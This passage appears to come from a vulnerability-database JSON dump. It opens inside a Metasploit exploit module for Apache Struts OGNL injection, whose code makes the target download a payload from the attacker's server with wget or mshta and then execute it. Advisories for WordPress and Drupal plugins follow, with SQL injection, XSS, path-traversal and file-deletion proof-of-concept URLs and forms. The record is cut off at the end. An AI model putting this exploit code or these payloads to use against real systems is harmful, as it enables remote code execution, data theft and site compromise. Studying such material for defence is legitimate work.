or res.code != 200 \nfail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - In order to autodetect, a valid action, returning 200, must be provided as TARGETURI, returning 200\") \nend \n \nproof = rand_text_alpha(6 + rand(4)) \n \nres = send_request_cgi({ \n'uri' => \"#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}\", \n'method' => 'GET' \n}) \n \nif res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ \nif res.headers['Location'] =~ /:\\\\/ \nreturn targets[1] # Windows \nelse \nreturn targets[2] # Linux \nend \nend \n \nfail_with(Exploit::Failure::NoTarget, \"#{rhost}:#{rport} - Target auto-detection didn't work\") \n \nend \n \ndef exploit_linux \n \ndownfile = rand_text_alpha(8+rand(8)) \n@pl = @exe \n@pl_sent = false \n \n# \n# start HTTP service if necessary \n# \nservice_url = start_http_service \n \n# \n# download payload \n# \nfname = datastore['WritableDir'] \nfname = \"#{fname}/\" unless fname =~ %r'/$' \nfname << downfile \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Downloading payload to #{fname}...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? 
or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# wait for payload download \n# \nwait_payload \n \nregister_file_for_cleanup(fname) \n \n# \n# chmod \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Make payload executable...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# execute \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\\//,\"$\")}').replace('$','\\\\u002f'))).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Execute payload...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \nend \n \ndef exploit_windows \n@var_exename = rand_text_alpha(4 + rand(4)) + '.exe' \n@pl = build_hta \n@pl_sent = false \n \n# \n# start HTTP service if necessary \n# \nservice_url = start_http_service \n \n# \n# execute hta \n# \nuri = normalize_uri(target_uri.path) \nuri << \"?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\\\u002f')})).start()}\" \n \nprint_status(\"#{rhost}:#{rport} - Execute payload through malicious HTA...\") \n \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri \n}) \n \nif res.nil? 
or res.code != 302 \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - OGNL injection failed\") \nend \n \n# \n# wait for payload download \n# \nwait_payload \n \nregister_file_for_cleanup(@var_exename) \nend \n \ndef exploit \nif target.name =~ /Automatic/ \nprint_status(\"#{rhost}:#{rport} - Target autodetection...\") \nmy_target = auto_target \nprint_good(\"#{rhost}:#{rport} - #{my_target.name} target found!\") \nelse \nmy_target = target \nend \n \np = exploit_regenerate_payload(my_target.platform, my_target.arch) \n@exe = generate_payload_exe({:code => p.encoded, :platform => my_target.platform, :arch => my_target.arch}) \n \nif my_target.name =~ /Linux/ \nif datastore['PAYLOAD'] =~ /windows/ \nfail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Linux, but you've selected a Windows payload!\") \nend \nexploit_linux \nelsif my_target.name =~ /Windows/ \nif datastore['PAYLOAD'] =~ /linux/ \nfail_with(Exploit::Failure::BadConfig, \"#{rhost}:#{rport} - The target is Windows, but you've selected a Linux payload!\") \nend \nexploit_windows \nend \nend \n \n# Handle incoming requests from the server \ndef on_request_uri(cli, request) \nvprint_status(\"#{rhost}:#{rport} - URI requested: #{request.inspect}\") \nif (not @pl) \nprint_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\") \nreturn \nend \nprint_status(\"#{rhost}:#{rport} - Sending the payload to the server...\") \n@pl_sent = true \nsend_response(cli, @pl) \nend \n \n# wait for the data to be sent \ndef wait_payload \nprint_status(\"#{rhost}:#{rport} - Waiting for the victim to request the payload...\") \n \nwaited = 0 \nwhile (not @pl_sent) \nselect(nil, nil, nil, 1) \nwaited += 1 \nif (waited > datastore['HTTP_DELAY']) \nfail_with(Exploit::Failure::Unknown, \"#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?\") \nend \nend \nend \n \ndef build_hta \nvar_shellobj = rand_text_alpha(rand(5)+5); 
\nvar_fsobj = rand_text_alpha(rand(5)+5); \nvar_fsobj_file = rand_text_alpha(rand(5)+5); \nvar_vbsname = rand_text_alpha(rand(5)+5); \nvar_writedir = rand_text_alpha(rand(5)+5); \n \nvar_origLoc = rand_text_alpha(rand(5)+5); \nvar_byteArray = rand_text_alpha(rand(5)+5); \nvar_writestream = rand_text_alpha(rand(5)+5); \nvar_strmConv = rand_text_alpha(rand(5)+5); \n \n# Doing in this way to bypass the ADODB.Stream restrictions on JS, \n# even when executing it as an \"HTA\" application \n# The encoding code has been stolen from ie_unsafe_scripting.rb \nprint_status(\"#{rhost}:#{rport} - Encoding payload into vbs/javascript/hta...\"); \n \n# Build the content that will end up in the .vbs file \nvbs_content = Rex::Text.to_hex(%Q| \nDim #{var_origLoc}, s, #{var_byteArray} \n#{var_origLoc} = SetLocale(1033) \n|) \n# Drop the exe payload into an ansi string (ansi ensured via SetLocale above) \n# for conversion with ADODB.Stream \nvbs_ary = [] \n# The output of this loop needs to be as small as possible since it \n# gets repeated for every byte of the executable, ballooning it by a \n# factor of about 80k (the current size of the exe template). In its \n# current form, it's down to about 4MB on the wire \n@exe.each_byte do |b| \nvbs_ary << Rex::Text.to_hex(\"s=s&Chr(#{(\"%d\" % b)})\\n\") \nend \nvbs_content << vbs_ary.join(\"\") \n \n# Continue with the rest of the vbs file; \n# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent \n# Then use ADODB.Stream again to write the binary to file. 
\n#print_status(\"Finishing vbs...\"); \nvbs_content << Rex::Text.to_hex(%Q| \nDim #{var_strmConv}, #{var_writedir}, #{var_writestream} \n#{var_writedir} = WScript.CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%TEMP%\") & \"\\\\#{@var_exename}\" \n \nSet #{var_strmConv} = CreateObject(\"ADODB.Stream\") \n \n#{var_strmConv}.Type = 2 \n#{var_strmConv}.Charset = \"x-ansi\" \n#{var_strmConv}.Open \n#{var_strmConv}.WriteText s, 0 \n#{var_strmConv}.Position = 0 \n#{var_strmConv}.Type = 1 \n#{var_strmConv}.SaveToFile #{var_writedir}, 2 \n \nSetLocale(#{var_origLoc})|) \n \nhta = <<-EOS \n<script> \nvar #{var_shellobj} = new ActiveXObject(\"WScript.Shell\"); \nvar #{var_fsobj} = new ActiveXObject(\"Scripting.FileSystemObject\"); \nvar #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings(\"%TEMP%\"); \nvar #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\",2,true); \n \n#{var_fsobj_file}.Write(unescape(\"#{vbs_content}\")); \n#{var_fsobj_file}.Close(); \n \n#{var_shellobj}.run(\"wscript.exe \" + #{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\", 1, true); \n#{var_shellobj}.run(#{var_writedir} + \"\\\\\\\\\" + \"#{@var_exename}\", 0, false); \n#{var_fsobj}.DeleteFile(#{var_writedir} + \"\\\\\\\\\" + \"#{var_vbsname}.vbs\"); \nwindow.close(); \n</script> \nEOS \n \nreturn hta \nend \n \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/122541/struts_default_action_mapper.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:15:04", "bulletinFamily": "exploit", "description": "", "modified": "2014-02-21T00:00:00", "published": "2014-02-21T00:00:00", "id": "PACKETSTORM:125330", "href": "https://packetstormsecurity.com/files/125330/AdRotate-3.9.4-SQL-Injection.html", "title": "AdRotate 3.9.4 SQL Injection", "type": "packetstorm", "sourceData": "`Advisory ID: HTB23201 \nProduct: AdRotate 
\nVendor: AJdG Solutions \nVulnerable Version(s): 3.9.4 and probably prior \nTested Version: 3.9.4 \nAdvisory Publication: January 30, 2014 [without technical details] \nVendor Notification: January 30, 2014 \nVendor Patch: January 31, 2014 \nPublic Disclosure: February 20, 2014 \nVulnerability Type: SQL Injection [CWE-89] \nCVE Reference: CVE-2014-1854 \nRisk Level: High \nCVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered a vulnerability in AdRotate, which can be exploited to perform SQL Injection attacks. \n \n \n1) SQL Injection in AdRotate: CVE-2014-1854 \n \nThe vulnerability exists due to insufficient validation of the \"track\" HTTP GET parameter passed to the \n\"/wp-content/plugins/adrotate/library/clicktracker.php\" script. The parameter is base64-decoded and used in an SQL query without further validation, so a remote unauthenticated attacker can execute arbitrary SQL commands in the application's database. 
\n \nThe following PoC code contains a base64-encoded string \"-1 UNION SELECT version(),1,1,1\", which will be injected into SQL query and will output MySQL server version: \n \nhttp://[host]/wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gU0VMRUNUIHZlcnNpb24oKSwxLDEsMQ== \n \nSuccessful exploitation will result in redirection to local URI that contains version of the MySQL server: \nhttp://[host]/wp-content/plugins/adrotate/library/5.1.71-community-log \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to AdRotate 3.9.5 \n \nMore Information: \nhttp://www.adrotateplugin.com/2014/01/adrotate-pro-3-9-6-and-adrotate-free-3-9-5/ \nhttp://wordpress.org/plugins/adrotate/changelog/ \nhttp://www.adrotateplugin.com/development/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23201 - https://www.htbridge.com/advisory/HTB23201 - SQL Injection in AdRotate. \n[2] AdRotate - http://wordpress.org/plugins/adrotate/ - AdRotate for WordPress. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. 
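How the clicktracker injection above works, and what the fix looks like, as an added example in Python that is not part of the advisory or of the AdRotate plugin: encode_track reproduces the exact base64 value carried in the PoC URL, and the two lookup functions run against an in-memory SQLite table constructed here (table and column names are assumptions, not the plugin's real schema). The concatenating version returns the database version for the injected id, the validated and parameterized version rejects the same input. SQLite spells the version function sqlite_version() and the toy query selects a single column, so the injected fragment is the one-column equivalent of the advisory's version(),1,1,1.

```python
import base64
import sqlite3

# Constructed stand-in for the click-tracking table; names are assumptions.
_SETUP = '''
CREATE TABLE ads (id INTEGER PRIMARY KEY, link TEXT, title TEXT, impressions INTEGER);
INSERT INTO ads VALUES (1, 'https://example.com/a', 'first ad', 10);
INSERT INTO ads VALUES (2, 'https://example.com/b', 'second ad', 20);
'''

def encode_track(sql_fragment):
    # The vulnerable script base64-decodes ?track=... before using it, so a PoC
    # has to carry the injection base64-encoded.
    return base64.b64encode(sql_fragment.encode()).decode()

def _db():
    con = sqlite3.connect(':memory:')
    con.executescript(_SETUP)
    return con

def vulnerable_lookup(track):
    # Mirrors the bug class: the decoded value is concatenated into the query,
    # so -1 UNION SELECT ... replaces the ad link with attacker-chosen data.
    decoded = base64.b64decode(track).decode()
    con = _db()
    row = con.execute('SELECT link FROM ads WHERE id = ' + decoded).fetchone()
    con.close()
    return row[0] if row else None

def hardened_lookup(track):
    # Decode strictly, require a positive integer id, bind it as a parameter.
    try:
        decoded = base64.b64decode(track, validate=True).decode()
        ad_id = int(decoded)
    except (ValueError, UnicodeDecodeError):
        return None
    if ad_id <= 0:
        return None
    con = _db()
    row = con.execute('SELECT link FROM ads WHERE id = ?', (ad_id,)).fetchone()
    con.close()
    return row[0] if row else None
```

The integer check is the real fix; the parameter binding is defence in depth for the day somebody widens the accepted type.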
Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125330/adrotate-sql.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:11:34", "bulletinFamily": "exploit", "description": "", "modified": "2014-04-25T00:00:00", "published": "2014-04-25T00:00:00", "href": "https://packetstormsecurity.com/files/126334/VideoWhisper-7-Cross-Site-Scripting.html", "id": "PACKETSTORM:126334", "type": "packetstorm", "title": "VideoWhisper 7 Cross Site Scripting", "sourceData": "`Vulnerability title: Cross-site scripting (XSS) vulnerability in Videowhisper \nCVE: CVE-2014-2715 \nVendor: VideoWhisper \nProduct: Videowhisper module for Drupal 7 \nAffected version: 7 \nFixed version: \nReported by: Mahmoud Ghorbanzadeh \n \nDetails: \n \nHello, \nI found a Cross-site scripting (XSS) vulnerability in the Videowhisper module for Drupal 7 (videowhisper-7.x). The vulnerability exists at line 2 and line 4 in drupal\\modules\\videowhisper\\vwrooms\\templates\\logout.tpl.php due to $_GET['module'] and $_GET['message'] variables respectively at line 347 in drupal\\modules\\videowhisper\\vwrooms\\vwrooms.module. \n \nPOC: drupal/index.php?q=vwrooms/logout&module=<script>alert('XSS1')</script>&message=<script>alert('XSS2')</script> \n \nVendor Notification: 18, Apr 2014 \n \nDiscovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers. \n \nBest Regards. 
\n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/126334/videowhisper7-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23199\r\nProduct: VideoWhisper Live Streaming Integration\r\nVendor: VideoWhisper\r\nVulnerable Version(s): 4.27.3 and probably prior\r\nTested Version: 4.27.3\r\nAdvisory Publication: February 6, 2014 [without technical details]\r\nVendor Notification: February 6, 2014 \r\nVendor Patch: February 7, 2014 \r\nPublic Disclosure: February 27, 2014 \r\nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]\r\nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908\r\nRisk Level: Critical \r\nCVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files.\r\n\r\n\r\n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905\r\n\r\nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in 
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php". A remote attacker can upload and execute an arbitrary PHP file on the target system. \r\n\r\nThe following PoC code demonstrates exploitation of the vulnerability:\r\n\r\nAfter successful exploitation the remote shell will be accessible via the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg\r\n\r\nSuccessful exploitation depends on the webserver configuration: the uploaded file keeps the double extension .php.jpg, so it is only executed where the server still hands such a name to the PHP handler (the classic case is Apache with AddHandler for .php, whose multiple-extension processing applies the handler to any file carrying .php anywhere in its name) and is not configured to treat the .jpg mime-type as the deciding factor.\r\n\r\n\r\n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906\r\n\r\n2.1 The vulnerability exists due to insufficient filtration of the "m" HTTP POST parameter in the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary HTML and script code in the browser in the context of the vulnerable website when a user visits a page with the plugin\u2019s widget enabled. 
The script will be also executed in administrative section on the following page: \r\n\r\nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=live\r\n\r\nThe exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" method="post">\r\n<input type="hidden" name="s" value="1">\r\n<input type="hidden" name="u" value="1">\r\n<input type="hidden" name="r" value="1">\r\n<input type="hidden" name="m" value="<script>alert('immuniweb')</script>">\r\n</form>\r\n</body>\r\n \r\n2.2 The vulnerability exists due to insufficient filtration of "msg" HTTP POST parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page. 
\r\n\r\nThe exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php" method="post">\r\n<input type="hidden" name="msg" value="<script>alert('immuniweb')</script>">\r\n<input type="hidden" name="r" value="1">\r\n</form>\r\n</body>\r\n\r\nThe code will be executed when the user visits the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/uploads/[room]/Log[date].html \r\n\r\nWhere [room] is set by HTTP POST parameter r and [date] is the current date.\r\n \r\n2.3 The vulnerabilities exist due to insufficient filtration of "n" HTTP GET parameter passed to scripts "channel.php", "htmlchat.php", "video.php" and "videotext.php" within the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\r\n\r\n2.4 The vulnerability exists due to insufficient filtration of "message" HTTP GET parameter passed to 
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php" script. A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E\r\n\r\n2.5 The vulnerability exists due to insufficient filtration of "ct" HTTP POST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" script. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php" method="post">\r\n<input type="hidden" name="s" value="1">\r\n<input type="hidden" name="r" value="1">\r\n<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">\r\n</form>\r\n</body>\r\n\r\n2.6 The vulnerability exists due to insufficient filtration of "ct" HTTP POST parameter passed to "/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php" script. 
A remote attacker can trick a user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n \r\n<body onLoad="document.hack.submit()">\r\n<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php" method="post">\r\n<input type="hidden" name="s" value="1">\r\n<input type="hidden" name="r" value="1">\r\n<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">\r\n</form>\r\n</body>\r\n\r\n\r\n3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907\r\n \r\n3.1 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php" script. A remote attacker can view contents of arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below displays contents of "/etc/passwd" file:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd\r\n\r\n3.2 The vulnerability exists due to insufficient filtration of "s" HTTP GET parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php" script. 
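Sections 1, 3.1 and 3.2 of this advisory share one root cause: a client-supplied name (a snapshot filename, or the s parameter of rtmp_login.php and rtmp_logout.php) is joined to a directory and used without checking what it resolves to. The Python below is an added example and not code from the advisory or from the plugin; the base directory, the allow-list of image extensions and the token-based storage name are assumptions made for this example. resolve_inside refuses the two traversal PoCs while accepting a normal room log path, and stored_snapshot_name refuses 1.php.jpg and every other multi-extension or traversing name.

```python
import posixpath

ALLOWED_IMAGE_EXT = {'jpg', 'jpeg', 'png', 'gif'}   # assumed policy for snapshots

def resolve_inside(base_dir, user_path):
    # Lexically resolve user_path against an absolute base and keep the result only
    # if it stays below base. Pure string work, so it runs without a filesystem;
    # symlinks are not followed here, a real deployment should realpath() as well.
    base = posixpath.normpath(base_dir)
    if not base.startswith('/'):
        raise ValueError('base_dir must be absolute')
    if not user_path or user_path.startswith('/') or chr(0) in user_path:
        return None
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    if candidate == base or posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate

def stored_snapshot_name(client_filename, token):
    # Never reuse the client name. Accept it only if it is a bare name with exactly
    # one extension from the allow-list, then store it under a server-chosen token,
    # so 1.php.jpg (which Apache multi-extension handling can pass to PHP) is refused.
    if client_filename != posixpath.basename(client_filename) or chr(0) in client_filename:
        return None
    parts = client_filename.split('.')
    if len(parts) != 2 or not parts[0]:
        return None
    ext = parts[1].lower()
    if ext not in ALLOWED_IMAGE_EXT:
        return None
    return token + '.' + ext
```

For the delete path in rtmp_logout.php the same resolve_inside check applies, with the additional rule that the resolved name must also match the expected file pattern before unlink() is ever called.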
A remote attacker can delete arbitrary files on the target system using directory traversal sequences.\r\n\r\nThe exploitation example below deletes a file "/tmp/immuniweb":\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb\r\n\r\nSuccessful exploitation of this vulnerability requires that file "/tmp/immuniweb" exists on the system.\r\n\r\n\r\n4) Information Exposure Through Externally-generated Error Message in VideoWhisper Live Streaming Integration: CVE-2014-1908\r\n\r\n4.1 The vulnerability exists due to improper implementation of error handling mechanisms in multiple scripts. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and gain knowledge of full installation path of the application. \r\n\r\nThe following URL can be used to gain knowledge of full installation path of the application:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/videowhisper_streaming.php\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp.inc.php\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to VideoWhisper Live Streaming Integration version 4.29.5\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23089 - https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in VideoWhisper Live Streaming Integration Plugin for WordPress.\r\n[2] VideoWhisper Live Streaming Integration - http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The VideoWhisper Live Streaming software can easily be used to add video broadcasting features to WordPress sites and live video streams on blog 
pages.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30589", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30589", "title": "Multiple Vulnerabilities in VideoWhisper Live Streaming Integration WP Plugin", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2014-0111: Remote code execution by an authenticated administrator\r\n\r\nSeverity: Important\r\n\r\nVendor:\r\nThe Apache Software Foundation\r\n\r\nVersions Affected:\r\nSyncope 1.0.0 to 1.0.8\r\nSyncope 1.1.0 to 1.1.6\r\n\r\nDescription:\r\nIn the various places in which Apache Commons JEXL expressions are allowed (derived schema definition, user / role templates, account links of resource mappings) a malicious administrator 
can inject Java code that can be executed remotely by the JEE container running the Apache Syncope core.\r\n\r\nCredit:\r\nThis issue was discovered by Gregory Draperi.\r\n\r\nReferences:\r\nhttp://syncope.apache.org/security.html\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (GNU/Linux)\r\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\r\n\r\niQEcBAEBAgAGBQJTTOJyAAoJEGtDE+0nPfKHxWcIAI9POTzr4bIF7fXO25uXgfny\r\nBO8SR0fmGScdmeohf8nQZbUNgKA1F7YRe5vC9r8nKFSpdDJrMnPSTOwMYrgdOxHt\r\nRl/SpEab4b8NX0FO1a6TObDbXBDj+Q+4cNUXOOc0jC7lU67n1SorfGaMbjLfcZ0w\r\n2xnZsbAQ0P0bmIJ2mR+LuXLsEA3kwvClF9fUTEDlJ4Rm/yT16UGvD5+vEJdMQzen\r\nJhBdT8VeX4wvtYr9+WmmWqeWgvSmezE07s5Pu36qXkxAEFGzdQBtJ/XJbpbgM7Sa\r\n7MoZQHQqJ5VwUVGMseqcxhAjD065uHP41HpAeF4TFQvp4jg8/FiybFdXqiJ+smI=\r\n=4XQi\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-04T00:00:00", "published": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30593", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30593", "title": "[SECURITY] CVE-2014-0111 Apache Syncope", "type": "securityvulns", "cvss": {"score": 6.5, "vector": 